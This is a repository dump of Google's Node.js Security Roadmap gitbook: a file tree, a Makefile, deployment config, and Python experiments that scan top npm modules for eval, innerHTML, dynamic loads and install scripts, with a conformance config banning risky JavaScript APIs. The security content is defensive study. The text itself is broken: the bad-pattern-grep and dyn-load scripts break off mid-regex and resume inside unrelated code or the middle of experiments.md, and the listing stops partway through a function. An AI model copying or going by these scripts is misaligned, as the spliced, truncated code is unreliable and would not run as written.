├── .bookignore
├── .gitignore
├── .well-known
└── security.txt
├── CONTRIBUTING.md
├── CONTRIBUTORS.md
├── LICENSE
├── Makefile
├── README.md
├── SUMMARY.md
├── app.yaml
├── appendix
├── .gitignore
├── bad-pattern-grep
│ └── experiment.py
├── dyn-load
│ └── experiment.py
├── experiments.md
├── jsconf
│ ├── conformance_proto.textproto
│ └── experiment.py
├── lazy-load
│ └── experiment.py
├── py_common
│ ├── __init__.py
│ └── npm.py
├── test-code
│ └── experiment.py
├── top100.txt
└── uses-scripts
│ └── experiment.py
├── book.json.withcomments
├── chapter-1
├── recap.md
├── threat-0DY.md
├── threat-BOF.md
├── threat-CRY.md
├── threat-DEX.md
├── threat-DOS.md
├── threat-EXF.md
├── threat-LQC.md
├── threat-MTP.md
├── threat-QUI.md
├── threat-RCE.md
├── threat-SHP.md
├── threat-UIR.md
└── threats.md
├── chapter-2
├── bounded-eval.md
├── bundling.md
├── dynamism.md
├── example
│ ├── .gitignore
│ ├── graphs
│ │ ├── filtered.dot
│ │ ├── filtered.svg
│ │ ├── full.dot
│ │ └── full.svg
│ ├── index.js
│ ├── lib
│ │ ├── dynamic.js
│ │ ├── lazy.js
│ │ ├── opt2.js
│ │ └── static.js
│ ├── make_dep_graph.sh
│ ├── package.json
│ └── test
│ │ └── test.js
├── experiments
│ └── webpack-compat
│ │ ├── .gitignore
│ │ ├── goodbye.js
│ │ ├── hello.js
│ │ ├── index.js
│ │ ├── package.json
│ │ ├── test-utils.js
│ │ ├── test.sh
│ │ ├── test
│ │ └── test.js
│ │ └── webpack.config.js
├── source-contents.md
├── synthetic-modules.md
└── what-about-eval.md
├── chapter-3
└── knowing_dependencies.md
├── chapter-4
└── close_dependencies.md
├── chapter-5
└── oversight.md
├── chapter-6
└── failing.md
├── chapter-7
├── child-processes.md
├── examples
│ ├── sh
│ │ ├── index.js
│ │ ├── package.json
│ │ └── test
│ │ │ └── test.js
│ └── sql
│ │ ├── index.js
│ │ ├── package.json
│ │ └── test
│ │ └── test.js
├── libraries.md
├── query-langs.md
└── structured-strings.md
├── cover.md
├── images
├── FileExternal.svg
├── GitHub-Mark-32px.png
├── ic_print_24dp.svg
└── npmjs-node.png
├── license.md
├── package-lock.json
├── package.json
├── styles
└── website.css
└── third_party
├── __init__.py
└── jslex
├── __init__.py
└── jslex.py
/.bookignore:
--------------------------------------------------------------------------------
1 | app.yaml
2 | Makefile
3 | book.json.withcomments
4 | appendix/**/*.py
5 | appendix/**/*.textproto
6 | chapter-2/example/**/*.js
7 | chapter-2/experiments/**/*.js
8 | chapter-7/examples/**/*.js
9 | CONTRIBUTING.md
10 | **/*.sh
11 | third_party
12 | package.json
13 | package-lock.json
14 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # See appendix/experiments.md for how to run experiments.
2 | appendix/jsconf/externs
3 | appendix/tools
4 | # Generated by `npm install`
5 | node_modules
6 | npm-debug.log
7 | chapter-2/example/package-lock.json
8 | # Generated by Makefile
9 | www
10 | deploy
11 | .*.tstamp
12 | #book.json # Should be ignored but breaks gitbook
13 | # Generated by `gitbook serve`
14 | _book
15 | # Emacs droppings
16 | .\#*
17 | *~
18 | # Python droppings
19 | *.pyc
20 |
--------------------------------------------------------------------------------
/.well-known/security.txt:
--------------------------------------------------------------------------------
1 | Contact: mikesamuel@gmail.com
2 | Acknowledgement: https://github.com/google/node-sec-roadmap/tree/master/CONTRIBUTORS.md
3 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # How to Contribute
2 |
3 | We'd love to accept your patches and contributions to this project. There are
4 | just a few small guidelines you need to follow.
5 |
6 | ## Contributor License Agreement
7 |
8 | Contributions to this project must be accompanied by a Contributor License
9 | Agreement. You (or your employer) retain the copyright to your contribution;
10 | this simply gives us permission to use and redistribute your contributions as
11 | part of the project. Head over to <https://cla.developers.google.com/> to see
12 | your current agreements on file or to sign a new one.
13 |
14 | You generally only need to submit a CLA once, so if you've already
15 | submitted one (even if it was for a different project), you probably
16 | don't need to do it again.
17 |
18 | ## Code reviews
19 |
20 | All submissions, including submissions by project members, require review. We
21 | use GitHub pull requests for this purpose. Consult
22 | [GitHub Help](https://help.github.com/articles/about-pull-requests/) for more
23 | information on using pull requests.
24 |
--------------------------------------------------------------------------------
/CONTRIBUTORS.md:
--------------------------------------------------------------------------------
1 | * [Ali Ijaz Sheikh](https://github.com/ofrobots)
2 | * [Franziska Hinkelmann](https://github.com/fhinkel/)
3 | * [Jen Tong](https://github.com/mimming)
4 | * [John J. Barton](https://github.com/johnjbarton)
5 | * [Justin Beckwith](https://github.com/JustinBeckwith)
6 | * [Mark S. Miller](https://github.com/erights)
7 | * [Mike Samuel](https://github.com/mikesamuel)
8 | * [Myles Borins](https://github.com/mylesborins)
9 |
10 | Special thanks for feedback and criticism:
11 |
12 | * [Matteo Collina](https://github.com/mcollina)
13 | * [Rich Trott](https://github.com/Trott)
14 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Markdown and gitbook content is (C) Google LLC and is
2 | made available under
3 | https://creativecommons.org/licenses/by/4.0/
4 |
5 |
6 | Code is available under the Apache 2.0 License
7 | ----------------------------------------------
8 | Copyright 2017 Google LLC
9 |
10 | Licensed under the Apache License, Version 2.0 (the "License");
11 | you may not use this file except in compliance with the License.
12 | You may obtain a copy of the License at
13 |
14 | https://www.apache.org/licenses/LICENSE-2.0
15 |
16 | Unless required by applicable law or agreed to in writing, software
17 | distributed under the License is distributed on an "AS IS" BASIS,
18 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
19 | See the License for the specific language governing permissions and
20 | limitations under the License.
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | # This Makefile builds various versions of the Gitbook, runs
2 | # sanity checks, and sets up a deployment directory.
3 | #
4 | # See `make help`
5 |
6 | define HELP
7 | Targets
8 | =======
9 | `make book` puts HTML files under www/
10 | `make pdf` builds the PDF version
11 | `make serve_static` serve the book from http://localhost:4000/
12 | `make serve` launch the builtin gitbook debug server
13 | `make check` runs sanity checks
14 | `make deploy` builds the deployment directory and runs checks
15 |
16 | Setup
17 | =====
18 | This assumes that PATH includes
19 | https://github.com/gjtorikian/html-proofer
20 | https://calibre-ebook.com/download
21 | that the following environment variables point to reasonable values:
22 | HTML_PROOFER # path to htmlproofer executable
23 | CALIBRE_HOME # path to directory containing calibre executables
24 |
25 | Deploying
26 | =========
27 | `make deploy` builds the deploy directory.
28 | From that directory `gcloud app deploy --project node-sec-roadmap`
29 | deploys to the canonical location if you have the right
30 | privileges and have run `gcloud auth login`.
31 | endef
32 | export HELP
33 |
34 |
35 | ROOT_DIR:=$(shell dirname $(realpath $(lastword $(MAKEFILE_LIST))))
36 |
37 | # External dependency used to detect dead links
38 | ifeq ($(HTML_PROOFER),)
39 | HTML_PROOFER:=${HOME}/.gem/ruby/2.4.0/gems/html-proofer-3.8.0/bin/htmlproofer
40 | ifeq (,$(wildcard ${HTML_PROOFER}))
41 | HTML_PROOFER:=/bin/echo
42 | endif
43 | endif
44 |
45 | # External dependency used to build pdf
46 | ifeq ($(CALIBRE_HOME),)
47 | CALIBRE_HOME:=/Applications/calibre.app/Contents/console.app/Contents/MacOS/
48 | endif
49 |
50 |
51 | # Bits that gitbook depends on
52 | GITBOOK_DEPS := node_modules book.json cover.md SUMMARY.md CONTRIBUTORS.md \
53 | $(wildcard chapter-*/*.md) appendix/experiments.md \
54 | styles/website.css images/*
55 |
56 |
57 | help:
58 | @echo "$$HELP"
59 |
60 | book.json : book.json.withcomments
61 | @cat book.json.withcomments \
62 | | perl -ne 'print unless m/^[ \t]*#/' > book.json
63 |
64 | pdf : www/node-sec-roadmap.pdf
65 | www/node-sec-roadmap.pdf : $(GITBOOK_DEPS)
66 | PATH="${PATH}:./node_modules/.bin/:${CALIBRE_HOME}" \
67 | ./node_modules/.bin/gitbook pdf . www/node-sec-roadmap.pdf
68 |
69 | book : www/.book.tstamp
70 | www/.book.tstamp : $(GITBOOK_DEPS)
71 | "${ROOT_DIR}"/node_modules/.bin/gitbook build . www
72 | @touch www/.book.tstamp
73 |
# `make check` runs sanity checks against the deployment directory:
#   1. npm / Node.js capitalization and undefined Markdown link names,
#   2. dead links (only when HTML_PROOFER points at a real executable),
#   3. no node_modules directory has leaked into deploy/.
# The timestamp is written last so that a failed check is not recorded as
# a success and skipped on the next invocation.
# `find` exits 0 whether or not it matches anything, so the node_modules
# check tests for non-empty output instead of relying on the exit status.
check : .check.tstamp
.check.tstamp : deploy/.deploy.tstamp
	echo Checking that we correctly capitalize npm and Nodejs
	echo and that all Markdown link names are defined.
	@! find deploy/www/ -name \*.html \
	    | xargs egrep '\]\[|[nN][oO][dD][eE]J[sS]|\bN[Pp][Mm]\b' \
	    | egrep -v 'x\[a\]\[b\]|this\[x\]\[|[.]jfrog[.]com/'
	echo Checking for dead links
	@if [ "${HTML_PROOFER}" = "/bin/echo" ]; then \
	    echo "Warning: HTML_PROOFER not available"; \
	else \
	    echo Running htmlproofer; \
	    "${HTML_PROOFER}" \
	        --alt-ignore=example/graphs/full.svg \
	        "${ROOT_DIR}"/deploy/www/; \
	fi
	@[ -z "$$(find deploy -name node_modules)" ] \
	    || (echo "deploy/ should not include node_modules"; false)
	touch .check.tstamp
93 |
94 | serve : $(GITBOOK_DEPS)
95 | "${ROOT_DIR}"/node_modules/.bin/gitbook serve
96 |
# Serves the built book from www/ on http://localhost:4000/.
# Each recipe line runs in its own /bin/sh, so a plain `cd` is enough and
# avoids the bash-only pushd/popd builtins.  `&&` keeps the server from
# starting in the repository root if www/ is missing.
serve_static : book
	cd www && python -m SimpleHTTPServer 4000
99 |
100 | clean :
101 | rm -rf www/ deploy/ _book/ book.json .*.tstamp
102 |
103 | node_modules : package.json
104 | npm install --only=prod
105 | @touch node_modules/
106 |
107 | deploy : deploy/.deploy.tstamp check
108 | deploy/.deploy.tstamp : book pdf app.yaml
109 | rm -rf deploy/
110 | mkdir deploy/
111 | cp app.yaml deploy/
112 | cp -r www/ deploy/www/
113 | @touch deploy/.deploy.tstamp
114 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Node.js Security Roadmap
2 |
3 | The security roadmap is a [gitbook](https://toolchain.gitbook.com/)
4 | publication available at
5 | *[nodesecroadmap.fyi](https://nodesecroadmap.fyi)*.
6 |
7 | ```sh
8 | $ npm start
9 | ```
10 |
11 | will serve the book via `localhost:4000`.
12 |
13 | ```sh
14 | $ make help
15 | ```
16 |
17 | will display help information about other options.
18 |
19 | Please file errata at the
20 | [issue tracker](https://github.com/google/node-sec-roadmap/issues)
21 | or send us a pull request.
22 |
23 | If you'd like to help out, please also see our
24 | [contribution guidelines](CONTRIBUTING.md).
25 |
--------------------------------------------------------------------------------
/SUMMARY.md:
--------------------------------------------------------------------------------
1 | # Summary
2 |
3 | * [Threat Environment](chapter-1/threats.md)
4 | * [Zero Day](chapter-1/threat-0DY.md)
5 | * [Buffer Overflow](chapter-1/threat-BOF.md)
6 | * [Weak Crypto](chapter-1/threat-CRY.md)
7 | * [Poor Developer Experience](chapter-1/threat-DEX.md)
8 | * [Denial of Service](chapter-1/threat-DOS.md)
9 | * [Exfiltration of Data](chapter-1/threat-EXF.md)
10 | * [Low Quality Code](chapter-1/threat-LQC.md)
11 | * [Malicious Third-Party Code](chapter-1/threat-MTP.md)
12 | * [Query Injection](chapter-1/threat-QUI.md)
13 | * [Remote Code Execution](chapter-1/threat-RCE.md)
14 | * [Shell Injection during Production](chapter-1/threat-SHP.md)
15 | * [Unintended Require](chapter-1/threat-UIR.md)
16 | * [Recap](chapter-1/recap.md)
17 | * [Dynamism when you need it](chapter-2/dynamism.md)
18 | * [Dynamic Bundling](chapter-2/bundling.md)
19 | * [Production Source Lists](chapter-2/source-contents.md)
20 | * [What about eval?](chapter-2/what-about-eval.md)
21 | * [Synthetic Modules](chapter-2/synthetic-modules.md)
22 | * [Bounded Eval](chapter-2/bounded-eval.md)
23 | * [Knowing your dependencies](chapter-3/knowing_dependencies.md)
24 | * [Keeping your dependencies close](chapter-4/close_dependencies.md)
25 | * [Oversight](chapter-5/oversight.md)
26 | * [When all else fails](chapter-6/failing.md)
27 | * [Library support for safe coding practices](chapter-7/libraries.md)
28 | * [Query languages](chapter-7/query-langs.md)
29 | * [Child processes](chapter-7/child-processes.md)
30 | * [Structured strings](chapter-7/structured-strings.md)
31 |
32 | ----
33 |
34 | * [Appendix: Experiments](appendix/experiments.md)
35 | * [Contributors](CONTRIBUTORS.md)
36 | * [License](license.md)
37 | * [Errata](https://github.com/google/node-sec-roadmap/issues)
38 |
--------------------------------------------------------------------------------
/app.yaml:
--------------------------------------------------------------------------------
1 | # cloud.google.com/appengine/docs/standard/python/config/appref
2 | runtime: python27
3 | api_version: 1
4 | threadsafe: true
5 |
6 | handlers:
7 | - url: /
8 | static_files: www/index.html
9 | upload: www/index.html
10 | secure: always
11 | mime_type: text/html; charset=UTF-8
12 | expiration: 30m
13 |
14 | - url: /(.*[.]html)$
15 | static_files: www/\1
16 | upload: www/(.*[.]html)$
17 | secure: always
18 | mime_type: text/html; charset=UTF-8
19 | expiration: 30m
20 |
21 | - url: /(.*[.]css)$
22 | static_files: www/\1
23 | upload: www/(.*[.]css)$
24 | secure: always
25 | mime_type: text/css; charset=UTF-8
26 | expiration: 30m
27 |
28 | - url: /(.*[.]js)$
29 | static_files: www/\1
30 | upload: www/(.*[.]js)$
31 | secure: always
32 | mime_type: text/javascript; charset=UTF-8
33 | expiration: 30m
34 |
35 | - url: /(.*[.]json)$
36 | static_files: www/\1
37 | upload: www/(.*[.]json)$
38 | secure: always
39 | mime_type: application/json; charset=UTF-8
40 | expiration: 30m
41 |
42 | - url: /(.*[.]txt)$
43 | static_files: www/\1
44 | upload: www/(.*[.]txt)$
45 | secure: always
46 | mime_type: text/plain; charset=UTF-8
47 | expiration: 30m
48 |
49 | - url: /(.*[.]svg)$
50 | static_files: www/\1
51 | upload: www/(.*[.]svg)$
52 | secure: always
53 | mime_type: image/svg+xml; charset=UTF-8
54 | expiration: 30m
55 |
56 | - url: /(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$
57 | static_files: www/\1
58 | upload: www/(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$
59 | secure: always
60 | expiration: 30m
61 |
62 | skip_files:
63 | - ^(.*/)?#.*#$
64 | - ^(.*/)?.*~$
65 | - ^(.*/)?.*\.py[co]$
66 | - ^(.*/)?.*/RCS/.*$
67 | - ^(.*/)?\.(?!well-known(?:/|$)).*$
68 |
--------------------------------------------------------------------------------
/appendix/.gitignore:
--------------------------------------------------------------------------------
1 | node_modules/**
2 | separate-modules/**
3 | **~
4 | **.pyc
5 |
--------------------------------------------------------------------------------
/appendix/bad-pattern-grep/experiment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # Copyright 2017 Google LLC
4 | #
5 | # Licensed under the Apache License, Version 2.0 (the "License");
6 | # you may not use this file except in compliance with the License.
7 | # You may obtain a copy of the License at
8 | #
9 | # https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 |
17 | """
18 | Look for problematic patterns like calls to eval and assignments
19 | to innerHTML that often lead to XSS when not consistently guarded.
20 | """
21 |
22 | import py_common.npm
23 | import re
24 | import sys
25 |
26 | _LEFT_BOUNDARY = r'(?> 2],
103 | values[len(values) >> 1],
104 | values[(len(values) * 3) >> 2],
105 | )
106 | print "| `%s` | %d | %d | %s |" % (
107 | v, count, total_count, quartiles)
108 |
--------------------------------------------------------------------------------
/appendix/dyn-load/experiment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # Copyright 2017 Google LLC
4 | #
5 | # Licensed under the Apache License, Version 2.0 (the "License");
6 | # you may not use this file except in compliance with the License.
7 | # You may obtain a copy of the License at
8 | #
9 | # https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 |
17 | """Looks for dynamic code loading patterns.
18 |
19 | Patterns to identify include
20 |
21 | * require(...) where ... is not a string literal.
22 | * eval
23 | * Function(...) where there is more than one argument or the sole
24 | argument is not a function.
25 |
26 | """
27 |
28 | import json
29 | import os.path
30 | import py_common.npm
31 | import re
32 | import shutil
33 | import sys
34 |
35 |
36 | dynamic_load_pattern = re.compile(
37 | r'(?
9 |
10 | ## Grepping for Problems {#grep-problems}
11 |
12 | JS Conformance uses sophisticated type reasoning to find
13 | problems in JavaScript code
14 | (see [JS Conformance experiment](#jsconf)).
15 | It may not find problems in code that lacks type hints
16 | or that does not parse.
17 |
18 | Grep can be used to reliably find some subset of problems that
19 | JS Conformance can identify.
20 |
21 | If grep finds more of the kinds of problems that it can find
22 | than JS Conformance, then the code cannot be effectively vetted
23 | by code quality tools like JS Conformance.
24 |
25 | | Violation | Count of Modules | Total Count | Quartiles |
26 | | --------- | ---------------- | ----------- | --------- |
27 | | `Function constructor` | 32 | 200 | 0 / 0 / 1 |
28 | | `URL property assignment` | 35 | 471 | 0 / 0 / 3 |
29 | | `eval` | 24 | 87 | 0 / 0 / 0 |
30 | | `innerHTML assignment` | 17 | 81 | 0 / 0 / 0 |
31 |
32 | ## Dynamic loads {#dynamic_load}
33 |
34 | Dynamic loading can complicate code bundling.
35 |
36 | 33 of 108 = 30.56% call `require(...)` without a literal string argument.
37 |
38 | ## JS Conformance {#jsconf}
39 |
40 | JS Conformance identifies uses of risky APIs.
41 |
42 | Some modules did not parse.  This may be due to TypeScript.
43 | JSCompiler doesn't deal well with mixed JavaScript and TypeScript
44 | inputs.
45 |
46 | If a module is both in the top 100 and is a dependency of another
47 | module in the top 100, then it will be multiply counted.
48 |
49 | Out of 69 modules that parsed
50 |
51 | | Violation | Count of Modules | Total Count | Quartiles |
52 | | --------- | ---------------- | ----------- | --------- |
53 | | `"arguments.callee" cannot be used in strict mode` | 2 | 3 | 0 / 0 / 0 |
54 | | `Argument list too long` | 8 | 8 | 0 / 0 / 0 |
55 | | `Illegal redeclared variable: ` | 2 | 9 | 0 / 0 / 0 |
56 | | `Parse error.` | 31 | 232 | 0 / 0 / 2 |
57 | | `This style of octal literal is not supported in strict mode.` | 4 | 11 | 0 / 0 / 0 |
58 | | `Violation: Assigning a value to a dangerous property via setAttribute is forbidden` | 1 | 4 | 0 / 0 / 0 |
59 | | `Violation: Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...` | 9 | 91 | 0 / 0 / 0 |
60 | | `Violation: eval is not allowed` | 1 | 3 | 0 / 0 / 0 |
61 | | `required "..." namespace not provided yet` | 7 | 30 | 0 / 0 / 0 |
62 | | `type syntax is only supported in ES6 typed mode: ` | 3 | 132 | 0 / 0 / 0 |
63 |
64 | ## Lazy loads {#lazy_load}
65 |
66 | Lazy loading can complicate code bundling if care is not taken.
67 |
68 | 71 of 108 = 65.74% contain a use of require inside a `{...}` block.
69 |
70 |
71 | ## Prod bundle includes test code {#test_code}
72 |
73 | Some of the top 100 modules are test code, e.g. mocha, chai.
74 | This measures which modules, when installed `--only=prod` include
75 | test patterns.
76 |
77 | 50 of 108 = 46.30% contain test code patterns
78 |
79 |
80 | ## Uses Scripts {#uses_scripts}
81 |
82 | Unless steps are taken, installation scripts run code on
83 | a developer's workstation when they have write access to
84 | local repositories. If this number is small, having
85 | humans check installation scripts before running might
86 | be feasible.
87 |
88 | 4 of 979 = 0.41% use installation scripts
89 |
90 |
91 |
92 |
93 |
94 |
95 | ## Methodology
96 |
97 | The code is [available on GitHub][code].
98 |
99 | ```bash
100 | $ npm --version
101 | 3.10.10
102 | ```
103 |
104 | ### Top 100 Module list
105 |
106 | I extracted `top100.txt` by browsing to the most depended-upon
107 | [package list][top100] and running the below in the dev console until
108 | I had >= 100 entries.
109 |
110 | ```js
111 | var links = document.querySelectorAll('a.name')
112 | var top100 = Object.create(null)
113 | for (var i = 0; i < links.length; ++i) {
114 | var link = links[i];
115 | var packageName = link.getAttribute('href').replace(/^.*\/package\//, '')
116 | top100[packageName] = true;
117 | }
118 | var top100Names = Object.keys(top100)
119 | top100Names.sort();
120 | top100Names
121 | ```
122 |
123 | ----
124 |
125 | We also require some tools so that we can run JSCompiler against
126 | node modules. From the root directory:
127 |
128 | ```sh
129 | mkdir tools
130 | curl https://dl.google.com/closure-compiler/compiler-latest.zip \
131 | > /tmp/closure-latest.zip
132 | pushd tools
133 | jar xf /tmp/closure-latest.zip
134 | popd
135 | pushd jsconf
136 | mkdir externs
137 | pushd externs
138 | git clone https://github.com/dcodeIO/node.js-closure-compiler-externs.git
139 | popd
140 | popd
141 | ```
142 |
143 |
144 | ### Experiments
145 |
146 | Each experiment corresponds to a directory with an executable
147 | `experiment.py` file which takes a `node_modules` directory and the top 100
148 | module list and which outputs a snippet of markup.
149 |
150 | Running
151 |
152 | ```bash
153 | cat top100.txt | xargs npm install --ignore-scripts --only=prod
154 | mkdir separate-modules
155 | cd separate-modules
156 | for pn in $(cat ../top100.txt ); do
157 | mkdir -p "$pn"
158 | pushd "$pn"
159 | npm install -g --prefix="node_modules/$pn" --ignore-scripts --only=prod "$pn"
160 | popd
161 | done
162 | ```
163 |
164 | pulls down the list of node modules. As of this writing, there are 980
165 | modules that are in the top100 list or are direct or indirect prod
166 | dependencies thereof.
167 |
168 | To run the experiments and place the outputs under `/tmp/mds/`, run
169 |
170 | ```bash
171 | mkdir -p /tmp/mds/
172 | export PYTHONPATH="$PWD:$PWD/../third_party:$PYTHONPATH"
173 | for f in *; do
174 | if [ -f "$f"/experiment.py ]; then
175 | "$f"/experiment.py node_modules separate-modules top100.txt \
176 | > "/tmp/mds/$f.md"
177 | fi
178 | done
179 | ```
180 |
181 | Concatenating those markdown snippets produces the summary above.
182 |
183 | ```bash
184 | (for f in $(echo /tmp/mds/*.md | sort); do
185 | cat "$f";
186 | done) \
187 | > /tmp/mds/summary
188 | ```
189 |
190 | [code]: https://github.com/google/node-sec-roadmap/tree/master/appendix
191 | [top100]: https://www.npmjs.com/browse/depended
192 |
--------------------------------------------------------------------------------
/appendix/jsconf/conformance_proto.textproto:
--------------------------------------------------------------------------------
1 | # Copyright 2014 The Closure Compiler Authors.
2 | #
3 | # Licensed under the Apache License, Version 2.0 (the "License");
4 | # you may not use this file except in compliance with the License.
5 | # You may obtain a copy of the License at
6 | #
7 | # http://www.apache.org/licenses/LICENSE-2.0
8 | #
9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 |
15 | # This file contains example JS conformance configurations for various problems
16 | # with JavaScript. Since each project may want to opt-in to different rules, and
17 | # each project may need its own specific whitelist, the examples in this file
18 | # are meant to be copied to a project specific conformance_proto.textproto file.
19 |
20 | requirement: {
21 | type: BANNED_NAME
22 | error_message: 'eval is not allowed'
23 |
24 | value: 'eval'
25 |
26 | whitelist: 'javascript/closure/base.js'
27 | whitelist: 'javascript/closure/json/json.js'
28 | }
29 |
30 | requirement: {
31 | rule_id: 'closure:stringFunctionDefinition'
32 | type: RESTRICTED_NAME_CALL
33 |
34 | value: 'Function:function()'
35 | value: 'setTimeout:function(string, ...?)'
36 | value: 'setImmediate:function(string, ...?)'
37 | value: 'setInterval:function(string, ...?)'
38 | value: 'requestAnimationFrame:function(string, ...?)'
39 |
40 | error_message: 'Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...'
41 | }
42 |
43 | requirement: {
44 | rule_id: 'closure:windowStringFunctionDefinition'
45 | type: RESTRICTED_METHOD_CALL
46 |
47 | value: 'Window.prototype.setTimeout:function(string, ...?)'
48 | value: 'Window.prototype.setImmediate:function(string, ...?)'
49 | value: 'Window.prototype.setInterval:function(string, ...?)'
50 | value: 'Window.prototype.requestAnimationFrame:function(string, ...?)'
51 |
52 | error_message: 'window.setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...'
53 | }
54 |
55 | requirement: {
56 | type: BANNED_PROPERTY
57 | error_message: 'Arguments.prototype.callee'
58 |
59 | value: 'Arguments.prototype.callee'
60 |
61 | whitelist: 'javascript/closure/base.js' # goog.base uses arguments.callee
62 | whitelist: 'javascript/closure/debug/' # legacy stack trace support, etc
63 | }
64 |
65 | requirement: {
66 | type: BANNED_PROPERTY_WRITE
67 | error_message: 'Assignment to Element.prototype.innerHTML is not allowed'
68 |
69 | value: 'Object.innerHTML'
70 |
71 | # Safe wrapper for this property.
72 | whitelist: 'javascript/closure/dom/safe.js'
73 |
74 | # Safely used in goog.string.unescapeEntitiesUsingDom_; the string assigned to
75 | # innerHTML is a single HTML entity.
76 | whitelist: 'javascript/closure/string/string.js'
77 | }
78 |
79 | requirement: {
80 | type: BANNED_PROPERTY_WRITE
81 | error_message: 'Assignment to Element.prototype.outerHTML is not allowed'
82 |
83 | value: 'Object.outerHTML'
84 |
85 | # Safe wrapper for this property.
86 | whitelist: 'javascript/closure/dom/safe.js'
87 | }
88 |
89 | requirement: {
90 | type: BANNED_PROPERTY_WRITE
91 | error_message: 'Assignment to Location.prototype.href is not allowed'
92 |
93 | value: 'Location.prototype.href'
94 |
95 | # Safe wrapper for this property.
96 | whitelist: 'javascript/closure/dom/safe.js'
97 | }
98 |
99 | requirement: {
100 | type: BANNED_PROPERTY_WRITE
101 | error_message: 'Assignment to location is not allowed'
102 |
103 | value: 'Window.prototype.location'
104 | }
105 |
106 | requirement: {
107 | type: BANNED_PROPERTY_WRITE
108 | error_message: 'Assignment to .href property or src'
109 |
110 | # Types with .href properties that do not extend from Element.
111 | # value: 'StyleSheet.prototype.href'
112 | # value: 'CSSImportRule.prototype.href'
113 |
114 | # All other types extend from Element.
115 | # value: 'Element.prototype.href'
116 | value: 'Object.href'
117 | value: 'Object.src'
118 |
119 | # Safe wrapper for this property.
120 | whitelist: 'javascript/closure/dom/safe.js'
121 | }
122 |
123 | requirement: {
124 | rule_id: 'setAttribute URL'
125 | type: BANNED_CODE_PATTERN
126 | error_message: 'Assigning a value to a dangerous property via setAttribute is forbidden'
127 | value:
128 | '/**\n'
129 | ' * @param {*} element\n'
130 | ' * @param {?} value\n'
131 | ' */\n'
132 | 'function template(element, value) {'
133 | ' element.setAttribute(\'src\', value);'
134 | '}'
135 | value:
136 | '/**\n'
137 | ' * @param {*} element\n'
138 | ' * @param {?} value\n'
139 | ' */\n'
140 | 'function template(element, value) {\n'
141 | ' element.setAttribute(\'href\', value);\n'
142 | '}'
143 | }
144 |
145 | requirement: {
146 | type: BANNED_PROPERTY_WRITE
147 | error_message: 'Use of document.domain is not allowed'
148 |
149 | value: 'Document.prototype.domain'
150 | }
151 |
--------------------------------------------------------------------------------
/appendix/jsconf/experiment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | """
4 | Runs JSConformance on each of the top 100 modules and collates the results.
5 | """
6 |
7 | # Copyright 2017 Google LLC
8 | #
9 | # Licensed under the Apache License, Version 2.0 (the "License");
10 | # you may not use this file except in compliance with the License.
11 | # You may obtain a copy of the License at
12 | #
13 | # https://www.apache.org/licenses/LICENSE-2.0
14 | #
15 | # Unless required by applicable law or agreed to in writing, software
16 | # distributed under the License is distributed on an "AS IS" BASIS,
17 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
18 | # See the License for the specific language governing permissions and
19 | # limitations under the License.
20 |
21 | import json
22 | import os.path
23 | import py_common.npm
24 | import re
25 | import shutil
26 | import subprocess
27 | import sys
28 |
29 |
30 | _error_re = re.compile(r'(?m)^\S+: ERROR - ((?![.]\s)[^\r\n]*)')
31 | # Patterns that can be used to group error messages by glossing over
32 | # any content not in a capturing group.
33 | _simplifier_res = (
34 | re.compile(r'^(required ").*?(" namespace not provided yet)'),
35 | re.compile(r'^(type syntax is only supported in ES6 typed mode: ).*'),
36 | re.compile(r'^(Illegal redeclared variable: ).*'),
37 | re.compile(r'^(Parse error[.]).*'),
38 | )
39 |
40 |
def run_jsconf(node_modules, module_name, externs, arg_max=240000):
    """
    Runs JSConformance on the given module's source files.

    Invokes the Closure Compiler jar found under
    <dirname(node_modules)>/tools/closure-compiler-latest/ in checks-only
    mode, using the conformance config at
    <dirname(node_modules)>/jsconf/conformance_proto.textproto.

    Args:
      node_modules: path to the node_modules directory; also passed to
          the compiler as the JS module root.
      module_name: name of the module whose sources should be checked.
      externs: iterable of externs file paths; passed to the compiler
          in sorted order.
      arg_max: upper bound on the length of the space-joined command
          line.  The default is the limit this script has always used
          (chosen with `getconf ARG_MAX` on Mac OSX in mind).

    Returns:
      A list of violation strings:
        * ['Argument list too long'] if the command line would reach
          arg_max; the compiler is not run in that case.
        * otherwise 'Passed' (only when the compiler exits with 0)
          followed by one entry per "ERROR - ..." line of compiler
          output, with variable parts replaced by '...' for messages
          matched by _simplifier_res.

    Raises:
      Exception: if no source files are found for module_name.
    """
    srcs = py_common.npm.js_srcs_almost_worst_case(
        node_modules, module_name,
        module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name))
    if not srcs:
        raise Exception(module_name + ' has no srcs')

    # Tools and the conformance config live next to node_modules.
